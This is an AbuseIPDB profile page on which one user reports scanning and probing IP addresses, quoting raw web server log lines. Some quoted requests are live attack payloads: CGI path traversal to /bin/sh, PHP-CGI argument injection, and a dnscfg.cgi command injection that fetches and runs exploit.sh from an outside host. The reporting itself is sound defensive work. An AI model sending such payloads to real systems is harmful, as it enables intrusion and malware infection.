Stefan Dreher - AbuseIPDB User Profile

JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

User Stefan Dreher joined AbuseIPDB in October 2018 and has reported 24,300 IP addresses.

Standing (weight) is good.

ACTIVE USER

IP	Date	Comment	Categories
🇺🇸 20.98.140.180	18 minutes ago	20.98.140.180 - - [10/Jun/2026:02:57:34 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.edisc ... show more 20.98.140.180 - - [10/Jun/2026:02:57:34 +0200] "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0.x" ... show less	Hacking Web App Attack
🇺🇸 20.65.194.9	2 hours ago	20.65.194.9 - - [10/Jun/2026:00:39:35 +0200] "GET / HTTP/1.1" 200 2505 "-" "Mozilla/5.0 zgrab/0.x" . ... show more 20.65.194.9 - - [10/Jun/2026:00:39:35 +0200] "GET / HTTP/1.1" 200 2505 "-" "Mozilla/5.0 zgrab/0.x" ... show less	Hacking Web App Attack
🇸🇬 94.237.67.231	3 hours ago	94.237.67.231 - - [09/Jun/2026:23:47:57 +0200] "GET / HTTP/1.0" 200 612 "-" "ivre-masscan/1.3 https: ... show more 94.237.67.231 - - [09/Jun/2026:23:47:57 +0200] "GET / HTTP/1.0" 200 612 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/" ... show less	Hacking Web App Attack
🇳🇱 192.253.248.169	3 hours ago	192.253.248.169 - - [09/Jun/2026:23:30:38 +0200] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 (iPho ... show more 192.253.248.169 - - [09/Jun/2026:23:30:38 +0200] "GET /.env HTTP/1.1" 404 153 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 192.253.248.169 - - [09/Jun/2026:23:30:38 +0200] "GET /.env.php HTTP/1.1" 404 153 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 192.253.248.169 - - [09/Jun/2026:23:30:38 +0200] "GET /.env.sample.php HTTP/1.1" 404 153 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 192.253.248.169 - - [09/Jun/2026:23:30:38 +0200] "GET /.env.local.php HTTP/1.1" 404 153 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" 192.253.248.169 - - [09/Jun/2026:23:30:38 +0200] "GET /.env.production.php HTTP/1.1" 404 153 "-" "Mozilla/5.0 ( show less	Hacking Brute-Force
🇺🇸 135.119.89.139	4 hours ago	135.119.89.139 - - [09/Jun/2026:22:58:12 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.p ... show more 135.119.89.139 - - [09/Jun/2026:22:58:12 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 153 "-" "-" 135.119.89.139 - - [09/Jun/2026:22:58:12 +0200] "GET /this_is_a_new_hello_world.php HTTP/1.1" 404 153 "-" "-" 135.119.89.139 - - [09/Jun/2026:22:58:12 +0200] "GET /classgoto24.php HTTP/1.1" 404 153 "-" "-" 135.119.89.139 - - [09/Jun/2026:22:58:15 +0200] "GET /cu.php HTTP/1.1" 404 153 "-" "-" 135.119.89.139 - - [09/Jun/2026:22:58:16 +0200] "GET /4PJcpMFsD8B.php HTTP/1.1" 404 153 "-" "-" ... show less	Hacking Brute-Force
🇮🇪 18.203.98.160	5 hours ago	18.203.98.160 - - [09/Jun/2026:22:08:28 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatible ... show more 18.203.98.160 - - [09/Jun/2026:22:08:28 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])" ... show less	Hacking Web App Attack
🇧🇷 20.226.82.126	5 hours ago	20.226.82.126 - - [09/Jun/2026:22:01:57 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.ph ... show more 20.226.82.126 - - [09/Jun/2026:22:01:57 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 153 "-" "-" 20.226.82.126 - - [09/Jun/2026:22:01:57 +0200] "GET /this_is_a_new_hello_world.php HTTP/1.1" 404 153 "-" "-" 20.226.82.126 - - [09/Jun/2026:22:01:58 +0200] "GET /classgoto24.php HTTP/1.1" 404 153 "-" "-" 20.226.82.126 - - [09/Jun/2026:22:01:58 +0200] "GET /cu.php HTTP/1.1" 404 153 "-" "-" 20.226.82.126 - - [09/Jun/2026:22:01:59 +0200] "GET /4PJcpMFsD8B.php HTTP/1.1" 404 153 "-" "-" ... show less	Hacking Brute-Force
🇺🇸 52.190.137.119	5 hours ago	52.190.137.119 - - [09/Jun/2026:21:47:45 +0200] "GET /mcp HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0 ... show more 52.190.137.119 - - [09/Jun/2026:21:47:45 +0200] "GET /mcp HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0.x" ... show less	Hacking Web App Attack
🇨🇭 107.189.28.30	7 hours ago	107.189.28.30 - - [09/Jun/2026:19:52:01 +0200] "GET /.env HTTP/1.1" 404 125 "-" "Mozilla/5.0 (compat ... show more 107.189.28.30 - - [09/Jun/2026:19:52:01 +0200] "GET /.env HTTP/1.1" 404 125 "-" "Mozilla/5.0 (compatible; DuckDuckBot/1.1; +http://duckduckgo.com/duckduckbot.html)" 107.189.28.30 - - [09/Jun/2026:19:52:06 +0200] "GET /.env.local HTTP/1.1" 404 125 "-" "Mozilla/5.0 (compatible; OAI-SearchBot/1.3; +https://openai.com/searchbot)" 107.189.28.30 - - [09/Jun/2026:19:52:11 +0200] "GET /.env.production HTTP/1.1" 404 125 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ChatGPT-User/1.0; +https://openai.com/bot)" 107.189.28.30 - - [09/Jun/2026:19:52:16 +0200] "GET /.env.development HTTP/1.1" 404 125 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ChatGPT-User/1.0; +https://openai.com/bot)" 107.189.28.30 - - [09/Jun/2026:19:52:21 +0200] "GET /.env.bak HTTP/1.1" 404 125 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" ... show less	Hacking Brute-Force
🇨🇦 13.71.185.109	7 hours ago	13.71.185.109 - - [09/Jun/2026:19:34:45 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.ph ... show more 13.71.185.109 - - [09/Jun/2026:19:34:45 +0200] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 153 "-" "-" 13.71.185.109 - - [09/Jun/2026:19:34:45 +0200] "GET /this_is_a_new_hello_world.php HTTP/1.1" 404 153 "-" "-" 13.71.185.109 - - [09/Jun/2026:19:34:45 +0200] "GET /classgoto24.php HTTP/1.1" 404 153 "-" "-" 13.71.185.109 - - [09/Jun/2026:19:34:45 +0200] "GET /cu.php HTTP/1.1" 404 153 "-" "-" 13.71.185.109 - - [09/Jun/2026:19:34:46 +0200] "GET /4PJcpMFsD8B.php HTTP/1.1" 404 153 "-" "-" ... show less	Hacking Brute-Force
🇺🇸 20.171.8.191	8 hours ago	20.171.8.191 - - [09/Jun/2026:18:49:35 +0200] "GET /hudson HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/ ... show more 20.171.8.191 - - [09/Jun/2026:18:49:35 +0200] "GET /hudson HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0.x" ... show less	Hacking Web App Attack
🇩🇪 159.195.83.49	8 hours ago	159.195.83.49 - - [09/Jun/2026:18:33:08 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 125 "-" ... show more 159.195.83.49 - - [09/Jun/2026:18:33:08 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 125 "-" "Mozilla/5.0 (BugBountyRecon/8.0)" 159.195.83.49 - - [09/Jun/2026:18:33:08 +0200] "GET /security.txt HTTP/1.1" 404 125 "-" "Mozilla/5.0 (BugBountyRecon/8.0)" 159.195.83.49 - - [09/Jun/2026:18:33:08 +0200] "GET /service/responsible-disclosure HTTP/1.1" 404 125 "-" "Mozilla/5.0 (BugBountyRecon/8.0)" 159.195.83.49 - - [09/Jun/2026:18:33:08 +0200] "GET /responsible-disclosure HTTP/1.1" 404 125 "-" "Mozilla/5.0 (BugBountyRecon/8.0)" 159.195.83.49 - - [09/Jun/2026:18:33:08 +0200] "GET /bugbounty HTTP/1.1" 404 125 "-" "Mozilla/5.0 (BugBountyRecon/8.0)" ... show less	Hacking Brute-Force
🇳🇱 176.65.139.66	9 hours ago	176.65.139.66 - - [09/Jun/2026:18:11:49 +0200] "GET / HTTP/1.0" 200 612 "-" "Shodan-Pull/1.0" ...	Hacking Web App Attack
🇨🇳 118.196.56.74	9 hours ago	118.196.56.74 - - [09/Jun/2026:18:04:51 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2 ... show more 118.196.56.74 - - [09/Jun/2026:18:04:51 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 157 "-" "-" 118.196.56.74 - - [09/Jun/2026:18:04:56 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 157 "-" "-" 118.196.56.74 - - [09/Jun/2026:18:05:01 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 153 "-" "libredtail-http" 118.196.56.74 - - [09/Jun/2026:18:05:02 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "libredtail-http" 118.196.56.74 - - [09/Jun/2026:18:05:04 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "libredtail-http" ... show less	Hacking Brute-Force
🇮🇪 52.30.190.47	9 hours ago	52.30.190.47 - - [09/Jun/2026:17:49:30 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatible; ... show more 52.30.190.47 - - [09/Jun/2026:17:49:30 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])" ... show less	Hacking Web App Attack
🇮🇪 18.201.203.126	10 hours ago	18.201.203.126 - - [09/Jun/2026:17:05:54 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatibl ... show more 18.201.203.126 - - [09/Jun/2026:17:05:54 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])" ... show less	Hacking Web App Attack
🇺🇸 20.55.2.194	10 hours ago	20.55.2.194 - - [09/Jun/2026:16:36:36 +0200] "GET /druid/index.html HTTP/1.1" 404 125 "-" "Mozilla/5 ... show more 20.55.2.194 - - [09/Jun/2026:16:36:36 +0200] "GET /druid/index.html HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0.x" ... show less	Hacking Web App Attack
🇷🇸 158.173.240.55	11 hours ago	158.173.240.55 - - [09/Jun/2026:16:10:11 +0200] "GET / HTTP/1.0" 200 612 "-" "masscan/1.3 (https://g ... show more 158.173.240.55 - - [09/Jun/2026:16:10:11 +0200] "GET / HTTP/1.0" 200 612 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)" ... show less	Hacking Web App Attack
🇮🇪 34.248.137.241	11 hours ago	34.248.137.241 - - [09/Jun/2026:15:29:33 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatibl ... show more 34.248.137.241 - - [09/Jun/2026:15:29:33 +0200] "GET / HTTP/1.0" 301 169 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; [email protected])" ... show less	Hacking Web App Attack
🇳🇱 176.65.139.155	12 hours ago	176.65.139.155 - - [09/Jun/2026:15:14:27 +0200] "GET /dnscfg.cgi?dns1=;cd /tmp\|\|cd /var/tmp\|\|cd /dev ... show more 176.65.139.155 - - [09/Jun/2026:15:14:27 +0200] "GET /dnscfg.cgi?dns1=;cd /tmp\|\|cd /var/tmp\|\|cd /dev/shm; (wget http://64.118.132.61/exploit.sh -O exploit.sh 2>/dev/null \|\| curl -s http://64.118.132.61/exploit.sh -o exploit.sh \|\| busybox wget http://64.118.132.61/exploit.sh -O exploit.sh 2>/dev/null \|\| tftp -g -r exploit.sh 64.118.132.61 69 \|\| ftpget -u \x22\x22 -p \x22\x22 -P 21 64.118.132.61 exploit.sh exploit.sh); [ -s exploit.sh ] && chmod 777 exploit.sh && ./exploit.sh&dns2=8.8.8.8 HTTP/1.1" 400 157 "-" "-" 176.65.139.155 - - [09/Jun/2026:15:14:27 +0200] "GET /dnscfg.cgi?dns1=8.8.8.8&dns2=;cd /tmp\|\|cd /var/tmp\|\|cd /dev/shm; (wget http://64.118.132.61/exploit.sh -O exploit.sh 2>/dev/null \|\| curl -s http://64.118.132.61/exploit.sh -o exploit.sh \|\| busybox wget http://64.118.132.61/exploit.sh -O exploit.sh 2>/dev/null \|\| tftp -g -r exploit.sh 64.118.132.61 69 \|\| ftpget -u \x22\x22 -p \x22\x22 -P 21 64.118.132.61 exploit.sh exploit.sh); [ -s exploit.sh ] && chmod 777 exploit.sh && ./exploit.sh HTTP/1.1" 400 show less	Hacking Brute-Force
🇬🇧 217.154.61.249	12 hours ago	217.154.61.249 - - [09/Jun/2026:14:58:15 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.% ... show more 217.154.61.249 - - [09/Jun/2026:14:58:15 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 157 "-" "-" 217.154.61.249 - - [09/Jun/2026:14:58:15 +0200] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 157 "-" "-" 217.154.61.249 - - [09/Jun/2026:14:58:15 +0200] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 153 "-" "libredtail-http" 217.154.61.249 - - [09/Jun/2026:14:58:15 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "libredtail-http" 217.154.61.249 - - [09/Jun/2026:14:58:15 +0200] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 153 "-" "libredtail-http" ... show less	Hacking Brute-Force
🇳🇱 45.148.10.200	12 hours ago	45.148.10.200 - - [09/Jun/2026:14:48:13 +0200] "GET / HTTP/1.1" 400 157 "-" "-" 45.148.10.200 - - [0 ... show more 45.148.10.200 - - [09/Jun/2026:14:48:13 +0200] "GET / HTTP/1.1" 400 157 "-" "-" 45.148.10.200 - - [09/Jun/2026:14:48:13 +0200] "GET /.env.stage HTTP/1.1" 404 125 "-" "l9explore/1.2.2" 45.148.10.200 - - [09/Jun/2026:14:48:13 +0200] "GET /.env.testing HTTP/1.1" 404 125 "-" "l9explore/1.2.2" 45.148.10.200 - - [09/Jun/2026:14:48:13 +0200] "GET /.github/workflows/ HTTP/1.1" 404 125 "-" "l9explore/1.2.2" 45.148.10.200 - - [09/Jun/2026:14:48:14 +0200] "GET /gradle.properties HTTP/1.1" 404 125 "-" "l9explore/1.2.2" ... show less	Hacking Brute-Force
🇺🇸 135.237.126.202	12 hours ago	135.237.126.202 - - [09/Jun/2026:14:44:08 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" ... show more 135.237.126.202 - - [09/Jun/2026:14:44:08 +0200] "GET /developmentserver/metadatauploader HTTP/1.1" 404 125 "-" "Mozilla/5.0 zgrab/0.x" ... show less	Hacking Web App Attack
🇳🇱 45.148.10.174	14 hours ago	45.148.10.174 - - [09/Jun/2026:12:58:47 +0200] "GET /%22js/holder.min.js%22 HTTP/1.1" 404 187 "-" "M ... show more 45.148.10.174 - - [09/Jun/2026:12:58:47 +0200] "GET /%22js/holder.min.js%22 HTTP/1.1" 404 187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 45.148.10.174 - - [09/Jun/2026:12:58:47 +0200] "GET /.env HTTP/1.1" 404 187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 45.148.10.174 - - [09/Jun/2026:12:58:47 +0200] "GET /%22js/jquery-1.11.3.min.js%22 HTTP/1.1" 404 125 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0" 45.148.10.174 - - [09/Jun/2026:12:58:47 +0200] "GET /%22js/ie10-viewport-bug-workaround.js%22 HTTP/1.1" 404 187 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" 45.148.10.174 - - [09/Jun/2026:12:58:47 +0200] "GET /%22js/bootstrap.min.js%22 HTTP/1.1" 404 187 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131. show less	Hacking Brute-Force
🇺🇸 34.23.244.20	14 hours ago	34.23.244.20 - - [09/Jun/2026:12:29:15 +0200] "GET //wp-includes/ID3/license.txt HTTP/1.1" 404 555 " ... show more 34.23.244.20 - - [09/Jun/2026:12:29:15 +0200] "GET //wp-includes/ID3/license.txt HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 34.23.244.20 - - [09/Jun/2026:12:29:15 +0200] "GET //feed/ HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 34.23.244.20 - - [09/Jun/2026:12:29:16 +0200] "GET //xmlrpc.php?rsd HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 34.23.244.20 - - [09/Jun/2026:12:29:16 +0200] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 34.23.244.20 - - [09/Jun/2026:12:29:16 +0200] "GET //web/wp-includes/wlwmanifest.xml HTTP/1.1" 404 555 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTM show less	Hacking Brute-Force